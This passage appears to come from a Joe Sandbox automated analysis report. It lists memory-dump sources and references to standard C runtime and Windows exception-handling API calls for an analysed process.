                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Valuetry_get_function
                                                                                                                    • String ID: FlsSetValue
                                                                                                                    • API String ID: 738293619-3750699315
                                                                                                                    APIs
                                                                                                                    • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF656005629
                                                                                                                    • _CxxThrowException.LIBVCRUNTIME ref: 00007FF65600563A
                                                                                                                      • Part of subcall function 00007FF656007018: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65600563F), ref: 00007FF65600708D
                                                                                                                      • Part of subcall function 00007FF656007018: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65600563F), ref: 00007FF6560070BF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                                                                    • String ID: Unknown exception
                                                                                                                    • API String ID: 3561508498-410509341